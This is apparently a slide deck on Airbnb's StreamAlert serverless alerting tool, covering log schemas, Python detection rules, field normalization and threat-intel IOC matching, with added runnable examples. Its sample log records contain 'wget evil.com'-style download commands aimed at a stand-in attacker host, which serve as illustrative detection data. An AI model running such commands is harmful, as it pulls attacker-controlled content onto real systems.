StreamAlert
Serverless, Real-time, Data Analysis
CHUNYONG LIN / RYAN DEIVERT / 7 JUNE 2018
1. Who Are We
2. What is StreamAlert
3. Data Normalization
4. Threat Intel
5. StreamAlert Apps
6. The Future
1. Who Are We
Ryan Deivert
CSIRT Engineer
Chunyong Lin
CSIRT Engineer
Austin Byers
CSIRT Engineer
Awesome You
CSIRT Engineer
Jack Naglieri
CSIRT Engineering Manager
2. StreamAlert
Architecture overview (diagram): incoming data arrives from Kinesis, SNS, S3 and StreamAlert Apps; StreamAlert evaluates it and dispatches outgoing alerts to Lambda, Slack, PagerDuty and S3.
StreamAlert
Serverless real-time data analysis
streamalert.io
github.com/airbnb/streamalert
Why StreamAlert?
● Serverless
● Real-time alerting
● Scalable
● Infrastructure as code
● Simple deployment
● Extensive data format support
○ CSV, JSON, key-value, syslog
● Support for different use-cases
○ Security monitoring, compliance, ops
{
"account": "123456",
"detail": {
"awsRegion": "us-west-2",
"eventID": "11111",
"eventName": "ConsoleLogin",
"eventSource": "signin.amazonaws.com",
"eventTime": "2018-06-07T00:00:00Z",
"eventType": "AwsConsoleSignIn"
},
"detail-type": "type",
"id": "11111",
"region": "us-west-2",
"resources": [],
"source": "source_stream_name",
"time": "2018-06-07T00:00:00Z",
"version": "1.0"
}
Incoming Log & Schema
{
"cloudwatch:events": {
"schema": {
"account": "string",
"detail": {},
"detail-type": "string",
"id": "string",
"region": "string",
"resources": [],
"source": "string",
"time": "string",
"version": "string"
},
"parser": "json"
}
}
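How a classifier uses a schema like the one above, as an added example that is not StreamAlert's own classifier: the raw line is parsed with the declared parser ("json"), its top-level keys must match the schema exactly, and each value must have the declared type ("string", {} for a nested object, [] for a list). The LOG_SCHEMAS dict, the strict extra-or-missing-key rule and the additional "integer", "float" and "boolean" type names are assumptions made for this example, and the sample events are constructed.

```python
"""Added example (not StreamAlert's classifier): validate an incoming record
against a StreamAlert-style schema and return its log type."""
import json

# Constructed copy of the cloudwatch:events schema from the slide.
LOG_SCHEMAS = {
    "cloudwatch:events": {
        "schema": {
            "account": "string",
            "detail": {},
            "detail-type": "string",
            "id": "string",
            "region": "string",
            "resources": [],
            "source": "string",
            "time": "string",
            "version": "string",
        },
        "parser": "json",
    }
}

# Assumed type vocabulary: schema declaration -> Python type a value must have.
_TYPE_MAP = {"string": str, "integer": int, "float": float, "boolean": bool}


def _matches_type(declared, value):
    """Return True if value has the type the schema declares."""
    if isinstance(declared, dict):       # {} means "a nested object"
        return isinstance(value, dict)
    if isinstance(declared, list):       # [] means "a list"
        return isinstance(value, list)
    expected = _TYPE_MAP.get(declared)
    if expected is None:
        return False                     # unknown declaration: refuse, never accept blindly
    if expected is int and isinstance(value, bool):
        return False                     # bool is a subclass of int; keep them apart
    return isinstance(value, expected)


def classify(raw_line):
    """Parse one raw line and return (log_type, record) for the first schema
    whose top-level keys and value types match exactly, else (None, None).
    Extra or missing keys are a mismatch, so a rule never sees a half-shaped record."""
    try:
        record = json.loads(raw_line)
    except ValueError:
        return None, None
    if not isinstance(record, dict):
        return None, None
    for log_type, config in LOG_SCHEMAS.items():
        if config["parser"] != "json":
            continue
        schema = config["schema"]
        if set(schema) != set(record):
            continue
        if all(_matches_type(schema[key], record[key]) for key in schema):
            return log_type, record
    return None, None


# Constructed samples: the ConsoleLogin event from the slide plus two that must be rejected.
GOOD_EVENT = json.dumps({
    "account": "123456", "detail": {"eventName": "ConsoleLogin"},
    "detail-type": "type", "id": "11111", "region": "us-west-2",
    "resources": [], "source": "source_stream_name",
    "time": "2018-06-07T00:00:00Z", "version": "1.0",
})
WRONG_TYPE = GOOD_EVENT.replace('"account": "123456"', '"account": 123456')
EXTRA_KEY = GOOD_EVENT[:-1] + ', "injected": true}'

if __name__ == "__main__":
    for line in (GOOD_EVENT, WRONG_TYPE, EXTRA_KEY, "not json"):
        print(classify(line)[0])
```

Only a record that classifies is handed to rules keyed on `logs=['cloudwatch:events']`; the two rejected samples show why a schema mismatch is treated as a classification failure rather than silently passed through.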
from stream_alert.shared.rule import rule

@rule(logs=['ghe:general'],        # evaluated only against GitHub Enterprise audit records
      outputs=['slack:alerts'])    # send the alert to the configured Slack output
def github_disable_two_factor_requirement_user(rec):
    """ Alert if two-factor authentication requirement
    was disabled for a user.
    """
    return rec['action'] == 'two_factor_authentication.disabled'
Simple Python Rule
from stream_alert.shared.rule import rule

@rule(logs=['cloudwatch:events'],
      # only run when detail.userIdentity and detail.eventType exist
      req_subkeys={'detail': ['userIdentity', 'eventType']})
def cloudtrail_root_account_usage(rec):
    """Alert when root AWS credentials are used."""
    return (rec['detail']['userIdentity']['type'] == 'Root'
            # ignore actions an AWS service performed on root's behalf
            and rec['detail']['userIdentity'].get('invokedBy') is None
            and rec['detail']['eventType'] != 'AwsServiceEvent')
More Complex Python Rule
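Why the rule above declares req_subkeys, shown with an added example that is not StreamAlert's rule processor: a minimal dispatcher skips a rule when the nested keys it needs are absent, so an event without detail.userIdentity never raises KeyError, while a root console sign-in fires and a root action invokedBy an AWS service does not. The rule body is the slide's; the registry, the process() function and the CloudWatch event records are assumptions constructed for this example.

```python
"""Added example (not StreamAlert's engine): a rule registry that honours
`logs` and `req_subkeys`, run over constructed CloudWatch events."""

_RULES = []   # assumed registry the decorator fills at import time


def rule(logs=None, req_subkeys=None, outputs=None):
    """Register a rule with the log types it applies to and the nested keys it needs."""
    def decorator(func):
        _RULES.append({"func": func, "logs": set(logs or []),
                       "req_subkeys": req_subkeys or {}, "outputs": outputs or []})
        return func
    return decorator


def _has_subkeys(rec, req_subkeys):
    """True only if every required nested key exists under its parent dict."""
    for parent, keys in req_subkeys.items():
        child = rec.get(parent)
        if not isinstance(child, dict):
            return False
        if any(key not in child for key in keys):
            return False
    return True


def process(log_type, rec):
    """Return the names of rules that fire for one classified record.
    Rules whose req_subkeys are missing are skipped instead of raising KeyError."""
    fired = []
    for entry in _RULES:
        if log_type not in entry["logs"]:
            continue
        if not _has_subkeys(rec, entry["req_subkeys"]):
            continue
        if entry["func"](rec):
            fired.append(entry["func"].__name__)
    return fired


@rule(logs=['cloudwatch:events'],
      req_subkeys={'detail': ['userIdentity', 'eventType']})
def cloudtrail_root_account_usage(rec):
    """Alert when root AWS credentials are used (the slide's rule body)."""
    return (rec['detail']['userIdentity']['type'] == 'Root'
            and rec['detail']['userIdentity'].get('invokedBy') is None
            and rec['detail']['eventType'] != 'AwsServiceEvent')


# Constructed events; only the fields the rule reads are filled in.
ROOT_CONSOLE_LOGIN = {"detail": {"eventType": "AwsConsoleSignIn",
                                 "userIdentity": {"type": "Root"}}}
ROOT_VIA_SERVICE = {"detail": {"eventType": "AwsApiCall",
                               "userIdentity": {"type": "Root",
                                                "invokedBy": "config.amazonaws.com"}}}
IAM_USER_LOGIN = {"detail": {"eventType": "AwsConsoleSignIn",
                             "userIdentity": {"type": "IAMUser"}}}
NO_IDENTITY = {"detail": {"eventType": "AwsConsoleSignIn"}}   # no userIdentity at all

if __name__ == "__main__":
    samples = [("root console login", ROOT_CONSOLE_LOGIN),
               ("root via service", ROOT_VIA_SERVICE),
               ("iam user", IAM_USER_LOGIN),
               ("no userIdentity", NO_IDENTITY)]
    for name, rec in samples:
        print(name, process('cloudwatch:events', rec))
```

Without the req_subkeys gate the fourth record would crash the rule (and, in a real Lambda, the whole batch); with it, the record is simply not a candidate for this rule.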
● CloudWatch Logs & Events Rules
● S3 Buckets & Event Notifications
● Kinesis Streams and Firehose
● Simple Notification Service
AWS Services for Incoming Data
● Lambda
● DynamoDB
● System Manager Parameter Store
AWS Services for Rule Processing
● S3 Bucket
● Athena
● Simple Queue Service
● Lambda Function
AWS Services for Output
Architecture (diagram):
● Incoming data: laptops, workstations and servers; SaaS applications; APIs; other sources, delivered through Kinesis, SNS, S3 and StreamAlert Apps
● Real-time data analysis: classify, normalize, enrich and process rules, backed by data enrichment and rule state (IOCs, rule metadata)
● Alerts: alert merging, then alert dispatching to the outgoing alert destinations (Lambda, Slack, PagerDuty, S3)
● Historical search: Kinesis Firehose → S3 → Athena, with partitioning driven by S3 events
Alert Searching via Athena
3. Normalization
The Problem
Log 1 from log_source_1:
{
"server": "cylin_server",
"command_line": "wget evil.com",
"computer_name": "cylin_mbp",
"md5": "ABCDEF123456",
"remote_ip": "1.2.3.4"
}
Log 2 from log_source_2:
{
"destinationAddress": "1.2.3.4",
"hostIdentifier": "cylin_mbp",
"cmdline": "wget -b evil.com",
"pid": "1234"
}
Log 1 from log_source_1:
{
"server": "cylin_server",
"command_line": "wget evil.com",
"computer_name": "cylin_mbp",
"md5": "ABCDEF123456",
"remote_ip": "1.2.3.4"
}
from stream_alert.shared.rule import rule

BAD_IP = '1.2.3.4'

@rule(logs=['log_source_1'])
def bad_ip_address_log_source_1(rec):
    """Alert on the record from bad ip address from log_source_1"""
    return rec['remote_ip'] == BAD_IP

Log 2 from log_source_2:
{
"destinationAddress": "1.2.3.4",
"hostIdentifier": "cylin_mbp",
"cmdline": "wget -b evil.com",
"pid": "1234"
}
from stream_alert.shared.rule import rule

BAD_IP = '1.2.3.4'

@rule(logs=['log_source_2'])
def bad_ip_address_log_source_2(rec):
    """Alert on the record from bad ip address from log_source_2"""
    return rec['destinationAddress'] == BAD_IP
The Solution
Normalized type   log_source_1      log_source_2
"hostName"        "computer_name"   "hostIdentifier"
"command"         "command_line"    "cmdline"
"ipAddress"       "remote_ip"       "destinationAddress"
from stream_alert.shared.rule import rule
from helpers.base import fetch_values_by_datatype

BAD_IP = '1.2.3.4'

@rule(datatypes=['ipAddress'])   # any log source that normalizes an ipAddress
def bad_ip_address(rec):
    """Alert on the record from bad ip address."""
    # every value normalized as ipAddress, whatever the original key was
    ip_addresses = fetch_values_by_datatype(rec, 'ipAddress')
    return BAD_IP in ip_addresses
Example Rule, Normalization
Potential Considerations
● Too many bad IP addresses to hard-code in rules
● Lambda memory limitation
● How to update with new IOCs
● How to resolve false positives
Classify & Normalize IOCs
● File hashes
● Domains
● IP addresses
4. Threat Intel
from stream_alert.shared.rule import rule
from stream_alert.rule_processor.threat_intel import StreamThreatIntel

@rule(datatypes=['ipAddress'])
def threat_intel_ioc_match_ip_address(rec):
    """Alert on the record from bad ip address."""
    # the threat intel step stores matched IOCs under IOC_KEY before rules run;
    # fire only if an IP indicator was among the matches
    if (StreamThreatIntel.IOC_KEY in rec
            and rec[StreamThreatIntel.IOC_KEY].get('ip')):
        return True
    return False
Example Rule, Threat Intelligence
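The Solution table, the datatype rule, the "Classify & Normalize IOCs" list and the threat intel rule above, run end to end as an added example that is not StreamAlert's implementation: a per-source field mapping produces normalized types, an enrichment step compares those values with an IOC table of IPs, domains and file hashes and tags matches under an assumed 'streamalert:ioc' key, and both rules then read the normalized record. The NORMALIZED_TYPES mapping, the in-memory IOC_TABLE (StreamAlert keeps its IOCs in DynamoDB), the fetch_values_by_datatype stand-in that returns values rather than key paths, and the three log records are all constructed assumptions.

```python
"""Added example (not StreamAlert's code): normalization, IOC enrichment and
the two slide rules over constructed records."""

IOC_KEY = 'streamalert:ioc'   # assumed name of the enrichment key the rule reads

# Constructed mapping from the "The Solution" table: normalized type -> source keys.
NORMALIZED_TYPES = {
    'log_source_1': {'hostName': ['computer_name'], 'command': ['command_line'],
                     'ipAddress': ['remote_ip'], 'fileHash': ['md5']},
    'log_source_2': {'hostName': ['hostIdentifier'], 'command': ['cmdline'],
                     'ipAddress': ['destinationAddress']},
}

# Constructed IOC table standing in for the DynamoDB table, keyed by indicator type.
IOC_TABLE = {
    'ip': {'1.2.3.4'},
    'domain': {'evil.com'},
    'md5': {'abcdef123456'},
}

BAD_IP = '1.2.3.4'


def normalize(log_source, rec):
    """Return {normalized_type: [values]} for the keys this source maps."""
    found = {}
    for datatype, keys in NORMALIZED_TYPES.get(log_source, {}).items():
        values = [rec[key] for key in keys if key in rec]
        if values:
            found[datatype] = values
    return found


def fetch_values_by_datatype(rec, datatype):
    """Stand-in for the StreamAlert helper: values stored under a normalized type."""
    return rec.get('normalized_types', {}).get(datatype, [])


def enrich_with_iocs(rec):
    """Compare normalized values with the IOC table; attach matches under IOC_KEY."""
    matches = {}
    for ip in fetch_values_by_datatype(rec, 'ipAddress'):
        if ip in IOC_TABLE['ip']:
            matches.setdefault('ip', []).append(ip)
    for digest in fetch_values_by_datatype(rec, 'fileHash'):
        if digest.lower() in IOC_TABLE['md5']:        # hashes compare case-insensitively
            matches.setdefault('md5', []).append(digest.lower())
    for command in fetch_values_by_datatype(rec, 'command'):
        for token in command.split():                  # crude: a listed domain as an argument
            if token.lower() in IOC_TABLE['domain']:
                matches.setdefault('domain', []).append(token.lower())
    if matches:
        rec[IOC_KEY] = matches
    return rec


def bad_ip_address(rec):
    """The slide's single rule that covers every source via the ipAddress datatype."""
    return BAD_IP in fetch_values_by_datatype(rec, 'ipAddress')


def threat_intel_ioc_match_ip_address(rec):
    """The slide's threat intel rule: fire if enrichment tagged an IP indicator."""
    return bool(rec.get(IOC_KEY, {}).get('ip'))


def process(log_source, rec):
    """Normalize, enrich, then run both rules (both declare datatypes=['ipAddress']).
    Returns (rules that fired, IOC matches)."""
    rec = dict(rec)                                    # leave the caller's record untouched
    rec['normalized_types'] = normalize(log_source, rec)
    enrich_with_iocs(rec)
    fired = []
    if 'ipAddress' in rec['normalized_types']:
        if bad_ip_address(rec):
            fired.append('bad_ip_address')
        if threat_intel_ioc_match_ip_address(rec):
            fired.append('threat_intel_ioc_match_ip_address')
    return fired, rec.get(IOC_KEY, {})


# Constructed records: the two from the slides plus a benign one.
LOG1 = {"server": "cylin_server", "command_line": "wget evil.com",
        "computer_name": "cylin_mbp", "md5": "ABCDEF123456", "remote_ip": "1.2.3.4"}
LOG2 = {"destinationAddress": "1.2.3.4", "hostIdentifier": "cylin_mbp",
        "cmdline": "wget -b evil.com", "pid": "1234"}
CLEAN = {"destinationAddress": "10.0.0.1", "hostIdentifier": "cylin_mbp",
         "cmdline": "ls -la", "pid": "42"}

if __name__ == "__main__":
    for source, record in [('log_source_1', LOG1), ('log_source_2', LOG2),
                           ('log_source_2', CLEAN)]:
        print(source, process(source, record))
```

The point of the split is that the IOC set changes daily while rules change rarely: the rule body never embeds indicators, so updating IOCs (and clearing a false positive) is a table write, not a Lambda deploy, which addresses the considerations listed above.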
5. StreamAlert Apps
StreamAlert Apps (diagram): a CloudWatch scheduled event triggers an App Lambda, which uses SSM Parameter Store for its configuration and polling state, collects logs from a SaaS application and sends them to the StreamAlert rule processor; more SaaS applications follow the same pattern.
Apps in Action
from stream_alert.shared.rule import rule

@rule(logs=['duo:authentication'])
def duo_fraud(rec):
    """Alert on any Duo authentication marked as fraud."""
    # the user pressed "fraud" on a push they did not initiate
    return rec['result'] == 'FRAUD'
Duo
Push notification marked as fraudulent by the end user
from helpers.base import ends_with_any
from stream_alert.shared.rule import rule

_VALID_EMAIL_SUFFIXES = {'@example.com', '@corp.example.com'}

@rule(logs=['box:admin_events'])
def box_events_non_domain_email(rec):
    """Alert on box logins with untrusted email addresses"""
    if rec['event_type'] != 'LOGIN':
        return False   # only login events are of interest here
    email = rec['created_by'].get('login')
    # fire unless the login address ends with a trusted suffix
    return not ends_with_any(email, _VALID_EMAIL_SUFFIXES)
Box
Box login with email outside of the trusted domain
from stream_alert.shared.rule import rule

@rule(logs=['gsuite:reports'])
def gsuite_suspicious_logons(rec):
    """Alert on suspicious G Suite logins"""
    if rec['id']['applicationName'] != 'login':
        return False
    # a report record carries a list of events, each with a list of
    # name/value parameters; look for a failed login challenge
    for event in rec['events']:
        if event.get('name') == 'login_challenge':
            for param in event.get('parameters', []):
                if (param.get('name') == 'login_challenge_status'
                        and param.get('value') == 'Challenge Failed.'):
                    return True
    return False
G Suite
G Suite user failed challenge during login
Alert in PagerDuty
6. The Future
In Progress
● Alert merging
● Rule “baking”
WE ARE HIRING!!!
https://goo.gl/6ZTvFJ
QUESTIONS?
@jacknagz
@ryandeivert
@austinbyers
@chunyong-lin
All third party names and trademarks are the property of their respective owners

 
OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...OpsWorks Configuration Management: automatizza la gestione e i deployment del...
OpsWorks Configuration Management: automatizza la gestione e i deployment del...
 
Microsoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows WorkloadsMicrosoft Active Directory su AWS per supportare i tuoi Windows Workloads
Microsoft Active Directory su AWS per supportare i tuoi Windows Workloads
 
Computer Vision con AWS
Computer Vision con AWSComputer Vision con AWS
Computer Vision con AWS
 
Database Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatareDatabase Oracle e VMware Cloud on AWS i miti da sfatare
Database Oracle e VMware Cloud on AWS i miti da sfatare
 
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSCrea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
 
API moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e webAPI moderne real-time per applicazioni mobili e web
API moderne real-time per applicazioni mobili e web
 
Database Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatareDatabase Oracle e VMware Cloud™ on AWS: i miti da sfatare
Database Oracle e VMware Cloud™ on AWS: i miti da sfatare
 
Tools for building your MVP on AWS
Tools for building your MVP on AWSTools for building your MVP on AWS
Tools for building your MVP on AWS
 
How to Build a Winning Pitch Deck
How to Build a Winning Pitch DeckHow to Build a Winning Pitch Deck
How to Build a Winning Pitch Deck
 
Building a web application without servers
Building a web application without serversBuilding a web application without servers
Building a web application without servers
 
Fundraising Essentials
Fundraising EssentialsFundraising Essentials
Fundraising Essentials
 
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
AWS_HK_StartupDay_Building Interactive websites while automating for efficien...
 
Introduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container ServiceIntroduzione a Amazon Elastic Container Service
Introduzione a Amazon Elastic Container Service
 

Airbnb - StreamAlert

  • 1. StreamAlert Serverless, Real-time, Data Analysis CHUNYONG LIN / RYAN DEIVERT / 7 JUNE 2018
  • 2. 1. Who Are We 2. What is StreamAlert 3. Data Normalization 4. Threat Intel 5. StreamAlert Apps 6. The Future
  • 3. 1. Who Are We Ryan Deivert CSIRT Engineer Chunyong Lin CSIRT Engineer Austin Byers CSIRT Engineer Awesome You CSIRT Engineer Jack Naglieri CSIRT Engineering Manager CSIRT Engineering
  • 4. StreamAlert: Serverless real-time data analysis (streamalert.io, github.com/airbnb/streamalert)
    Incoming Data: Kinesis, SNS, S3, StreamAlert Apps
    StreamAlert: Lambda
    Outgoing Alerts: Slack, PagerDuty, S3
  • 5. Why StreamAlert?
    ● Serverless
    ● Real-time alerting
    ● Scalable
    ● Infrastructure as code
    ● Simple deployment
    ● Extensive data format support
      ○ CSV, JSON, key-value, syslog
    ● Support for different use-cases
      ○ Security monitoring, compliance, ops
  • 6. Incoming Log & Schema

    Incoming log:

    {
      "account": "123456",
      "detail": {
        "awsRegion": "us-west-2",
        "eventID": "11111",
        "eventName": "ConsoleLogin",
        "eventSource": "signin.amazonaws.com",
        "eventTime": "2018-06-07T00:00:00Z",
        "eventType": "AwsConsoleSignIn"
      },
      "detail-type": "type",
      "id": "11111",
      "region": "us-west-2",
      "resources": [],
      "source": "source_stream_name",
      "time": "2018-06-07T00:00:00Z",
      "version": "1.0"
    }

    Schema for the cloudwatch:events log type:

    {
      "cloudwatch:events": {
        "schema": {
          "account": "string",
          "detail": {},
          "detail-type": "string",
          "id": "string",
          "region": "string",
          "resources": [],
          "source": "string",
          "time": "string",
          "version": "string"
        },
        "parser": "json"
      }
    }
  • 7. Simple Python Rule

    from stream_alert.shared.rule import rule

    @rule(logs=['ghe:general'], outputs=['slack:alerts'])
    def github_disable_two_factor_requirement_user(rec):
        """Alert if two-factor authentication requirement was disabled for a user."""
        return rec['action'] == 'two_factor_authentication.disabled'
  • 8. Incoming Log

    {
      "account": "123456",
      "detail": {
        "awsRegion": "us-west-2",
        "eventID": "11111",
        "eventName": "ConsoleLogin",
        "eventSource": "signin.amazonaws.com",
        "eventTime": "2018-06-07T00:00:00Z",
        "eventType": "AwsConsoleSignIn"
      },
      "detail-type": "type",
      "id": "11111",
      "region": "us-west-2",
      "resources": [],
      "source": "source_stream_name",
      "time": "2018-06-07T00:00:00Z",
      "version": "1.0"
    }
  • 9. More Complex Python Rule

    from stream_alert.shared.rule import rule

    @rule(logs=['cloudwatch:events'],
          req_subkeys={'detail': ['userIdentity', 'eventType']})
    def cloudtrail_root_account_usage(rec):
        """Alert when root AWS credentials are used."""
        return (rec['detail']['userIdentity']['type'] == 'Root' and
                rec['detail']['userIdentity'].get('invokedBy') is None and
                rec['detail']['eventType'] != 'AwsServiceEvent')
  • 10. AWS Services for Incoming Data
    ● CloudWatch Logs & Events Rules
    ● S3 Buckets & Event Notifications
    ● Kinesis Streams and Firehose
    ● Simple Notification Service
  • 11. AWS Services for Rule Processing
    ● Lambda
    ● DynamoDB
    ● System Manager Parameter Store
  • 12. AWS Services for Output
    ● S3 Bucket
    ● Athena
    ● Simple Queue Service
    ● Lambda Function
  • 13. Real-Time Data Analysis (architecture diagram)
    Incoming Data: Laptops, Workstations, Servers; SaaS Applications; APIs; Other, delivered via Kinesis, SNS, S3 and StreamAlert Apps
    Processing: Classify, Normalize, Enrich, and Process Rules (Lambda), backed by Data Enrichment and Rule State (IOCs, Rule Metadata)
    Alerts: Alert Merging, Alert Dispatching; Outgoing Alerts to Slack, PagerDuty, S3
    Historical Search: Kinesis Firehose, S3, Partitioning, Athena
  • 14. Alert Searching via Athena
  • 15. The Problem

    Two log sources report the same remote IP address under different field names, so a rule written against one source's field names does not apply to the other.

    Log 1 from log_source_1:

    {
      "server": "cylin_server",
      "command_line": "wget evil.com",
      "computer_name": "cylin_mbp",
      "md5": "ABCDEF123456",
      "remote_ip": "1.2.3.4"
    }

    Log 2 from log_source_2:

    {
      "destinationAddress": "1.2.3.4",
      "hostIdentifier": "cylin_mbp",
      "cmdline": "wget -b evil.com",
      "pid": "1234"
    }
  • 16. One rule per log source

    Log 1 from log_source_1:

    {
      "server": "cylin_server",
      "command_line": "wget evil.com",
      "computer_name": "cylin_mbp",
      "md5": "ABCDEF123456",
      "remote_ip": "1.2.3.4"
    }

    from stream_alert.shared.rule import rule

    BAD_IP = '1.2.3.4'

    @rule(logs=['log_source_1'])
    def bad_ip_address_log_source_1(rec):
        """Alert on the record from bad ip address from log_source_1"""
        return rec['remote_ip'] == BAD_IP

    Log 2 from log_source_2:

    {
      "destinationAddress": "1.2.3.4",
      "hostIdentifier": "cylin_mbp",
      "cmdline": "wget -b evil.com",
      "pid": "1234"
    }

    from stream_alert.shared.rule import rule

    BAD_IP = '1.2.3.4'

    @rule(logs=['log_source_2'])
    def bad_ip_address_log_source_2(rec):
        """Alert on the record from bad ip address from log_source_2"""
        return rec['destinationAddress'] == BAD_IP
  • 18. Example Rule, Normalization

    from stream_alert.shared.rule import rule
    from helpers.base import fetch_values_by_datatype

    BAD_IP = '1.2.3.4'

    @rule(datatypes=['ipAddress'])
    def bad_ip_address(rec):
        """Alert on the record from bad ip address."""
        ip_addresses = fetch_values_by_datatype(rec, 'ipAddress')
        return BAD_IP in ip_addresses
  • 19. Potential Considerations
    ● Too many bad ip addresses
    ● Lambda memory limitation
    ● How to update with new IOCs
    ● How to resolve False Positives
  • 20. Classify & Normalize IOCs
    ● File hashes
    ● Domains
    ● IP addresses
  • 21. Example Rule, Threat Intelligence

    from stream_alert.shared.rule import rule, disable
    from stream_alert.rule_processor.threat_intel import StreamThreatIntel

    @rule(datatypes=['ipAddress'])
    def threat_intel_ioc_match_ip_address(rec):
        """Alert on the record from bad ip address."""
        if (StreamThreatIntel.IOC_KEY in rec and
                rec[StreamThreatIntel.IOC_KEY].get('ip')):
            return True
        return False
  • 22. StreamAlert Apps (architecture diagram)
    Components: CloudWatch Scheduled Event, App Lambda, SSM Parameter Store, SaaS applications (and more), StreamAlert Rule Processor
  • 23. Apps in Action
  • 24. Duo: Duo Push notification marked as fraudulent by the end user

    from stream_alert.shared.rule import rule

    @rule(logs=['duo:authentication'])
    def duo_fraud(rec):
        """Alert on any Duo authentication marked as fraud."""
        return rec['result'] == 'FRAUD'
  • 25. Box: Box login with email outside of the trusted domain

    from helpers.base import ends_with_any
    from stream_alert.shared.rule import rule

    _VALID_EMAIL_SUFFIXES = {'@example.com', '@corp.example.com'}

    @rule(logs=['box:admin_events'])
    def box_events_non_domain_email(rec):
        """Alert on box logins with untrusted email addresses"""
        if rec['event_type'] != 'LOGIN':
            return False
        email = rec['created_by'].get('login')
        return not ends_with_any(email, _VALID_EMAIL_SUFFIXES)
  • 26. G Suite: G Suite user failed challenge during login

    from stream_alert.shared.rule import rule

    @rule(logs=['gsuite:reports'])
    def gsuite_suspicious_logons(rec):
        """Alert on suspicious G Suite logins"""
        if rec['id']['applicationName'] != 'login':
            return False
        for event in rec['events']:
            if event.get('name') == 'login_challenge':
                for param in event.get('parameters', []):
                    # the parameter's value is stored under the 'value' key
                    if (param.get('name') == 'login_challenge_status' and
                            param.get('value') == 'Challenge Failed.'):
                        return True
        return False
  • 27. Alert in PagerDuty
  • 28. The Future: In Progress
    ● Alert merging
    ● Rule "baking"
  • 30. QUESTIONS? @jacknagz @ryandeivert @austinbyers @chunyong-lin All third party names and trademarks are the property of their respective owners
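To make the normalization argument of slides 15 to 18 and the req_subkeys filter of slide 9 concrete, here is an added, runnable stand-in (not StreamAlert's own code) for the @rule decorator, the normalization step and fetch_values_by_datatype. The normalization table, the 'streamalert:normalization' key, the process() harness and the sample records are all constructed for this example; it shows a single datatype-based rule firing on both log sources and a CloudTrail-style record without userIdentity being skipped rather than raising KeyError.

```python
RULES = []  # registry filled by the stand-in @rule decorator below
def rule(logs=None, datatypes=None, req_subkeys=None, outputs=None):
    """Stand-in for stream_alert.shared.rule.rule: record the rule and its filters."""
    def wrap(func):
        RULES.append((func, logs or [], datatypes or [], req_subkeys or {}))
        return func
    return wrap

# Constructed normalization config: log type -> datatype -> field names in that log.
NORMALIZED_TYPES = {'log_source_1': {'ipAddress': ['remote_ip']},
                    'log_source_2': {'ipAddress': ['destinationAddress']}}
NORM_KEY = 'streamalert:normalization'  # assumed key name for the normalized values
def normalize(log_type, rec):
    """Tag the record with datatype -> [values]; original field names stay untouched."""
    rec[NORM_KEY] = {dt: [rec[f] for f in fields if f in rec]
                     for dt, fields in NORMALIZED_TYPES.get(log_type, {}).items()}
    return rec
def fetch_values_by_datatype(rec, datatype):
    return rec.get(NORM_KEY, {}).get(datatype, [])
def has_subkeys(rec, req_subkeys):
    """req_subkeys check: every listed subkey must exist under its parent dict."""
    return all(isinstance(rec.get(k), dict) and all(s in rec[k] for s in subs)
               for k, subs in req_subkeys.items())

def process(log_type, rec):
    """Classify, normalize, then evaluate: return names of rules that fire for one record."""
    rec = normalize(log_type, dict(rec))
    fired = []
    for func, logs, datatypes, req_subkeys in RULES:
        applies = log_type in logs or any(rec[NORM_KEY].get(dt) for dt in datatypes)
        if applies and has_subkeys(rec, req_subkeys) and func(rec):
            fired.append(func.__name__)
    return fired

BAD_IP = '1.2.3.4'

@rule(datatypes=['ipAddress'])  # one rule covers every source normalized to ipAddress
def bad_ip_address(rec):
    return BAD_IP in fetch_values_by_datatype(rec, 'ipAddress')
@rule(logs=['cloudwatch:events'], req_subkeys={'detail': ['userIdentity', 'eventType']})
def cloudtrail_root_account_usage(rec):
    ident = rec['detail']['userIdentity']
    return (ident['type'] == 'Root' and ident.get('invokedBy') is None
            and rec['detail']['eventType'] != 'AwsServiceEvent')

# Constructed sample records; the console login lacks userIdentity, so req_subkeys skips it.
LOG1 = {'server': 'cylin_server', 'command_line': 'wget evil.com', 'remote_ip': '1.2.3.4'}
LOG2 = {'destinationAddress': '1.2.3.4', 'hostIdentifier': 'cylin_mbp', 'pid': '1234'}
LOGIN_NO_IDENTITY = {'detail': {'eventName': 'ConsoleLogin', 'eventType': 'AwsConsoleSignIn'}}
```

Adding a third log source then only needs a new entry in the normalization table, not a third copy of the rule.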